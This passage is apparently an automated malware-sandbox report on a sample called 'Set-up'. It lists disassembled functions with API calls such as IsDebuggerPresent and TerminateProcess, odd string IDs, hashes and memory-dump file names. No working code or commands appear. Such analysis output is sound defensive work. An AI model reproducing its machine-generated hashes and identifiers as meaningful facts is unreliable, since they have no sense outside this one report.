                                                                                                                                  • String ID: 7EqG$@A$H=J?$U9F;$k7Q)
                                                                                                                                  • API String ID: 0-1467649568
                                                                                                                                  • Opcode ID: e0e68ea7dc3ab3379a842cc3e1dd6a5ef2a16c84e37a91afed43c3ff3cc704b2
                                                                                                                                  • Instruction ID: be92dc8546bd37f6cd71a29a9b589a02559b63ee330f5eddc531a616f324d5a7
                                                                                                                                  • Opcode Fuzzy Hash: e0e68ea7dc3ab3379a842cc3e1dd6a5ef2a16c84e37a91afed43c3ff3cc704b2
                                                                                                                                  • Instruction Fuzzy Hash: 74D113B15183418BD724DF24C8527ABB7F2FF96314F09991CE9858F394EB798805CB92
                                                                                                                                  Function 05491548 Relevance: 6.7, Strings: 5, Instructions: 499COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 7EqG$@A$H=J?$U9F;$k7Q)
                                                                                                                                  • API String ID: 0-1467649568
                                                                                                                                  • Opcode ID: 78d8d2e57be9f807328f3e5898bf8797b49680cd34cc95d7087d64c49ba11923
                                                                                                                                  • Instruction ID: a16f1dcac738dd24e8a50b52971ca021188245fd89d55faaa0bb63d40e10ebcd
                                                                                                                                  • Opcode Fuzzy Hash: 78d8d2e57be9f807328f3e5898bf8797b49680cd34cc95d7087d64c49ba11923
                                                                                                                                  • Instruction Fuzzy Hash: 97D1F3B15183428BDB28CF25C8527AB7BF2FF92314F09995DE8828F390E7799505CB52
                                                                                                                                  Function 058EDE60 Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: D$HI$L$xy$
                                                                                                                                  • API String ID: 0-3945132347
                                                                                                                                  • Opcode ID: 1089bc77347516779f8c07777a8bb5ceda5a6c3cbfd9a0ecd7a2efd9d36b0d43
                                                                                                                                  • Instruction ID: df83146d05db70d47b8a3db7f8ecddacea1709994a8d9ac87f620d979bd53b9f
                                                                                                                                  • Opcode Fuzzy Hash: 1089bc77347516779f8c07777a8bb5ceda5a6c3cbfd9a0ecd7a2efd9d36b0d43
                                                                                                                                  • Instruction Fuzzy Hash: 2AF107716187808BD714DF29C49576BBBF1FF86314F18892DE8E58B392D778C8098B52
                                                                                                                                  Function 0591E1C0 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %*+($GhC<$GhC<$KhC<$KhC<
                                                                                                                                  • API String ID: 0-3640935975
                                                                                                                                  • Opcode ID: bc92ecf489f5140421f96915db100f9b59fe64921f5c7bfe3030677c98e4024b
                                                                                                                                  • Instruction ID: 2e21394959f394fe42ada0c30028e520e0b61240370b5a2692333cfd6372d0ab
                                                                                                                                  • Opcode Fuzzy Hash: bc92ecf489f5140421f96915db100f9b59fe64921f5c7bfe3030677c98e4024b
                                                                                                                                  • Instruction Fuzzy Hash: D1416B317092255BC72949198C91B7EBBEBFBC9720F284A2CFCA5172C4CA349D068755
                                                                                                                                  Function 058ED660 Relevance: 5.3, Strings: 4, Instructions: 317COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "HDJ$>$F_$uw9
                                                                                                                                  • API String ID: 0-1920824788
                                                                                                                                  • Opcode ID: db89a92e8465f626fe880a803d2994e0672e615bd8c5af3f402e5e008234b867
                                                                                                                                  • Instruction ID: ff41dc73f0274d82dade6d9301b70884a7aecbab9009c4568018e52c8a5e1949
                                                                                                                                  • Opcode Fuzzy Hash: db89a92e8465f626fe880a803d2994e0672e615bd8c5af3f402e5e008234b867
                                                                                                                                  • Instruction Fuzzy Hash: 8781D57260D3958BD315CF29C8A177BBFE2AFD3204F18496DE8D6CB281D73989098752
                                                                                                                                  Function 0111911A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E39F10: InitializeCriticalSectionAndSpinCount.KERNEL32(01319A44,00000000,01119149,?,?,?,00E39DBA), ref: 00E39F13
                                                                                                                                    • Part of subcall function 00E39F10: GetLastError.KERNEL32(?,?,?,00E39DBA), ref: 00E39F1D
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00E39DBA), ref: 0111914D
                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E39DBA), ref: 0111915C
                                                                                                                                  Strings
                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 01119157
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                  • API String ID: 450123788-631824599
                                                                                                                                  • Opcode ID: a96cb1f60f2d71a8c2486ad0e4a027084d028c7a8ca4431075356f0defac6144
                                                                                                                                  • Instruction ID: 204a4d6128f9763082fb075910eb77a94d322468310fa5a9c64ebf76ccde663a
                                                                                                                                  • Opcode Fuzzy Hash: a96cb1f60f2d71a8c2486ad0e4a027084d028c7a8ca4431075356f0defac6144
                                                                                                                                  • Instruction Fuzzy Hash: 94E06D746013518FD3389F29D458383BAE8AB14758F008D6CE4A1D2345DBB0E488CFA1
                                                                                                                                  Function 01122F75 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0131B928), ref: 0112306D
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0131B928), ref: 01123077
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0131B600,?,?,?,?,?,0131B928), ref: 01123084
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: 5c14106eb7f1ced8de016d20f20d92257308f73e4ef8621d9289613b934dcdc6
                                                                                                                                  • Instruction ID: 2d4584f34ad28a077bdc415f046b10c271b5e6fb7f70f87267d1750a42823a3c
                                                                                                                                  • Opcode Fuzzy Hash: 5c14106eb7f1ced8de016d20f20d92257308f73e4ef8621d9289613b934dcdc6
                                                                                                                                  • Instruction Fuzzy Hash: 7F31D47491522D9BCB25DF28D8887CCBBB8BF08310F5042EAE51CA7250E7749B868F45
                                                                                                                                  Function 00E44BE0 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,00F7A8A0,c_ >= s_,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E44BE6
                                                                                                                                  • DebugBreak.KERNEL32(?,00F7A8A0,c_ >= s_,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E44BF0
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00E44C20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BreakDebugDebuggerExitPresentProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2005660601-0
                                                                                                                                  • Opcode ID: 46101e4e3eaeb7ba0692cc49b2513c025c4353c9ffa6f0d08eb7381c1d6853a9
                                                                                                                                  • Instruction ID: 3262a7eac9069d87b9cfaaac968d20f274414a60b7d084829427de0c351003e4
                                                                                                                                  • Opcode Fuzzy Hash: 46101e4e3eaeb7ba0692cc49b2513c025c4353c9ffa6f0d08eb7381c1d6853a9
                                                                                                                                  • Instruction Fuzzy Hash: 93E04F726407046BDB207F70AC46B4A3654AF04B15F609220BA35AA2D6DEB0F5958B6A
                                                                                                                                  Function 01124C83 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002,00000000,?,011231E2,00000003,0111AB4D,460C02D8), ref: 01124CA4
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002,00000000,?,011231E2,00000003,0111AB4D,460C02D8), ref: 01124CAB
                                                                                                                                  • ExitProcess.KERNEL32 ref: 01124CBD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 7eac750d07b57c4fa5f3a3dd239bb6ea1c5d285be270a585b4a40e8b4dbbdc80
                                                                                                                                  • Instruction ID: 27f32dc6a2d2f2f0ccc4f8848e35c4dc6190673ee70053a0f7f489ec18726e3a
                                                                                                                                  • Opcode Fuzzy Hash: 7eac750d07b57c4fa5f3a3dd239bb6ea1c5d285be270a585b4a40e8b4dbbdc80
                                                                                                                                  • Instruction Fuzzy Hash: 6CE08C31000258AFCF2A6F28D94CA483FA9EF14381F008024FD148BA35CB35ECA2EB80
                                                                                                                                  Function 058ED980 Relevance: 4.2, Strings: 3, Instructions: 460COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #-*$0$;4<9
                                                                                                                                  • API String ID: 0-465666365
                                                                                                                                  • Opcode ID: 9b94dc8781b5ce4e1831bd7a1123c21985bbcf93a6a9a06d5d41fc769b69dbab
                                                                                                                                  • Instruction ID: 153cbf56e040d76fce6c1a2902d359c911798052fcad37edd4c4175112507578
                                                                                                                                  • Opcode Fuzzy Hash: 9b94dc8781b5ce4e1831bd7a1123c21985bbcf93a6a9a06d5d41fc769b69dbab
                                                                                                                                  • Instruction Fuzzy Hash: BDC1F57150D3918BD721CF29985036BBBE2AFD3244F0889ADD8D5DB342D779C90AC792
                                                                                                                                  Function 058E1312 Relevance: 4.1, Strings: 3, Instructions: 307COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0123456789ABCDEFXP$0123456789abcdefxp$@
                                                                                                                                  • API String ID: 0-1376090547
                                                                                                                                  • Opcode ID: 13b18c69891e57137047eb22e1a54d005c578c345a60199661603506a5f57ef9
                                                                                                                                  • Instruction ID: 7558b83fd5e4a67ea08178f0e06035dc33bb45b40951f76f710b6820f2f16b86
                                                                                                                                  • Opcode Fuzzy Hash: 13b18c69891e57137047eb22e1a54d005c578c345a60199661603506a5f57ef9
                                                                                                                                  • Instruction Fuzzy Hash: A6B19D76A0C3518FD714CF19C49466AFBF2BBCA318F088A1DE9A697341C7749D09CB82
                                                                                                                                  Function 0112A159 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,01124706), ref: 0112A198
                                                                                                                                  Strings
                                                                                                                                  • GetSystemTimePreciseAsFileTime, xrefs: 0112A174
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                  • API String ID: 2086374402-595813830
                                                                                                                                  • Opcode ID: 9ce64f6dc6e13e6b8ba92b4b360f49c2101b23b387725d425538186b9f62510d
                                                                                                                                  • Instruction ID: 8590afb437d54167523dc54d3ee423f12a43979255f4924afd0b3486dbd2e7f4
                                                                                                                                  • Opcode Fuzzy Hash: 9ce64f6dc6e13e6b8ba92b4b360f49c2101b23b387725d425538186b9f62510d
                                                                                                                                  • Instruction Fuzzy Hash: 9DE0E531B45229B7D62EAB35AC0297EBBA4CF65A61B01016DFC056B240DF712D10D7C5
                                                                                                                                  Function 058FDBC0 Relevance: 3.0, Strings: 2, Instructions: 456COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X$\
                                                                                                                                  • API String ID: 0-249256547
                                                                                                                                  • Opcode ID: 51a97f1dbe9574da9e1f79ccd3785c4fb2f0feddf3911e4c2db348b3225f9ba0
                                                                                                                                  • Instruction ID: 37b8e7686eda67d74635ac9d6fd65a48cab13c4c8e474e6c5293fea005eedc96
                                                                                                                                  • Opcode Fuzzy Hash: 51a97f1dbe9574da9e1f79ccd3785c4fb2f0feddf3911e4c2db348b3225f9ba0
                                                                                                                                  • Instruction Fuzzy Hash: 66E1EEB2609341ABE301DF24D945B6FBBE5EFD5304F08882CEA8597291E674DD058B93
                                                                                                                                  Function 058E39B0 Relevance: 2.9, Strings: 2, Instructions: 404COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Inf$NaN
                                                                                                                                  • API String ID: 0-3500518849
                                                                                                                                  • Opcode ID: ab3d254769da3997f1e88546ccb08799e309f951cf8ff7bcfbc9ac9292fb3474
                                                                                                                                  • Instruction ID: 955faec4ef0e90d370424b7eb98db47c7e00e173f4e26b2713509341ac79b91c
                                                                                                                                  • Opcode Fuzzy Hash: ab3d254769da3997f1e88546ccb08799e309f951cf8ff7bcfbc9ac9292fb3474
                                                                                                                                  • Instruction Fuzzy Hash: F6D19171A083169BC714CE28C48166ABBF6FBC5750F258E2DEC95D7390EB71EC448B82
                                                                                                                                  Function 058FBFD8 Relevance: 2.8, Strings: 2, Instructions: 291COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tu0w$sq
                                                                                                                                  • API String ID: 0-1003487487
                                                                                                                                  • Opcode ID: 268b16e87c661e3dd42eba83072160901d5d51f69511ede7af2143e472ffa3e0
                                                                                                                                  • Instruction ID: 2e9c8853cc547314564d1898c7497138c3d3b3db0c5dcd2e588e0c847bc81576
                                                                                                                                  • Opcode Fuzzy Hash: 268b16e87c661e3dd42eba83072160901d5d51f69511ede7af2143e472ffa3e0
                                                                                                                                  • Instruction Fuzzy Hash: BBA198B110C3859BD310DF65D88166BFBE1FF96214F18892CE4D89B252E774CA09CB97
                                                                                                                                  Function 05921160 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+($%*+(
                                                                                                                                  • API String ID: 2994545307-3039692684
                                                                                                                                  • Opcode ID: 8e39237279743ecfb09ec7da6629966de4952ffd2571b5062d0fe393641e0b2a
                                                                                                                                  • Instruction ID: 87591e68147f009168dc7e58c9ae8b5c8a75af450981456acceb5c6cb2453eb1
                                                                                                                                  • Opcode Fuzzy Hash: 8e39237279743ecfb09ec7da6629966de4952ffd2571b5062d0fe393641e0b2a
                                                                                                                                  • Instruction Fuzzy Hash: 8581C235A083219BC724CF18C880A6EB7E6FFC9750F19892CE98697359D731AC61DB81
                                                                                                                                  Function 05920EA0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
